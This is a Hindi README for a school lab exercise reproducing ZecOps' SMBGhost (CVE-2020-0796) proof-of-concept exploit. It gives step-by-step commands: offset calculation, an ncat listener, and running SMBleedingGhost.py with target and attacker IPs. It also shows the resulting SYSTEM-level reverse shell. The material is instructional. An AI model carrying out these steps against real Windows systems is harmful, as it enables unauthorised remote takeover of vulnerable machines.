CVE-2020-0796 (SMBGhost) के लिए शैक्षिक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो विंडोज SMBv3 पर प्री-ऑथ RCE का प्रदर्शन करता है। इसमें नियंत्रित साइबर सुरक्षा प्रशिक्षण के लिए चरण-दर-चरण लैब सेटअप, ऑफसेट गणना और रिवर्स शेल निष्पादन शामिल है।
यह प्रोजेक्ट CVE-2020-0796 के प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट को प्रदर्शित करता है, जिसे SMBGhost के नाम से भी जाना जाता है - यह SMBv3 का उपयोग करने वाले Windows 10 और Windows Server सिस्टम को प्रभावित करने वाली एक महत्वपूर्ण प्री-ऑथ RCE कमजोरी है। इसे एक स्कूल साइबर सुरक्षा प्रोजेक्ट के हिस्से के रूप में विकसित किया गया था। सभी एक्सप्लॉइट कोड का श्रेय ZecOps को जाता है। मैंने केवल इसे शैक्षिक उद्देश्यों के लिए उपयोग और अनुकूलित किया है ताकि नियंत्रित लैब वातावरण में CVE-2020-0796 के शोषण का प्रदर्शन किया जा सके।
इस प्रदर्शन को दोहराने के लिए, निम्नलिखित सेटअप आवश्यक है:
SMBleedingGhost.py ZecOps द्वाराcalc_target_offsets.bat ZecOps द्वारादोनों हमलावर और लक्ष्य वर्चुअल मशीनों पर कमांड प्रॉम्प्ट लॉन्च करें।
प्रत्येक मशीन में निम्नलिखित कमांड निष्पादित करें:
ipconfig
CVE-2020-0796-RCE-POC-master फ़ोल्डर में जाएँ।calc_target_offsets.batCVE-2020-0796-RCE-POC-master फ़ोल्डर को खोलें।SMBleedingGhost.py पर राइट-क्लिक करें और नोटपैड से खोलें।SMBleedingGhost.py फ़ाइल में, नीचे स्क्रॉल करें और वह अनुभाग ढूँढें जो OFFSETS = { से शुरू होता है।एक नया कमांड प्रॉम्प्ट खोलें और चलाएँ:
ncat -lvp 4321
4321 पर एक लिसनर सेट करता है ताकि सफल शोषण पर लक्ष्य VM से रिवर्स शेल प्राप्त हो सके।cd Desktop
cd CVE-2020-0796-RCE-POC-master
dir
python SMBleedingGhost.py <target_ip> <attacker_ip> <port>
इस डेमो में उपयोग किया गया उदाहरण:
python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
192.168.18.61: लक्ष्य VM IP192.168.18.62: हमलावर VM IP4321: Netcat लिसनर में उपयोग किया गया पोर्टयदि सफल होता है, तो netcat विंडो दिखाएगी:
Microsoft Windows [Version 10.0.18362.356]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
यह पुष्टि करता है कि:
आप निम्नलिखित निष्पादित करके पहुँच को मान्य कर सकते हैं:
whoami
यह देगा:
whoami
nt authority\system
इसका मतलब है कि हमलावर VM के पास अब लक्ष्य VM पर सिस्टम-स्तरीय विशेषाधिकार हैं।
आप यह भी चला सकते हैं:
ipconfig
यह सत्यापित करने के लिए कि आप लक्ष्य VM के नेटवर्क के साथ बातचीत कर रहे हैं।

नोट: शोषण के बाद लक्ष्य VM क्रैश हो सकता है। यदि ऐसा होता है, तो आप इसे पुनः आरंभ कर सकते हैं। रीबूट के बाद हमलावर सत्र को पुनः स्थापित करने की आवश्यकता होगी।
यह प्रदर्शन ZecOps द्वारा विकसित सार्वजनिक रूप से उपलब्ध प्रूफ-ऑफ-कॉन्सेप्ट पर आधारित है।
सभी एक्सप्लॉइट कोड का श्रेय ZecOps को जाता है। मैंने केवल इसे शैक्षिक उद्देश्यों के लिए उपयोग और अनुकूलित किया है ताकि नियंत्रित लैब वातावरण में CVE-2020-0796 के शोषण का प्रदर्शन किया जा सके।
यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों के लिए बनाई गई है।
प्रदर्शित सभी उपकरण, स्क्रिप्ट और तकनीकें नियंत्रित लैब वातावरण में साइबर सुरक्षा कमजोरियों को समझने में मदद करने के लिए हैं। उन सिस्टम या नेटवर्क पर किसी भी प्रदान की गई सामग्री का उपयोग करने का प्रयास न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है।
सॉफ़्टवेयर के किसी भी दुरुपयोग की जिम्मेदारी लेखक की नहीं होगी।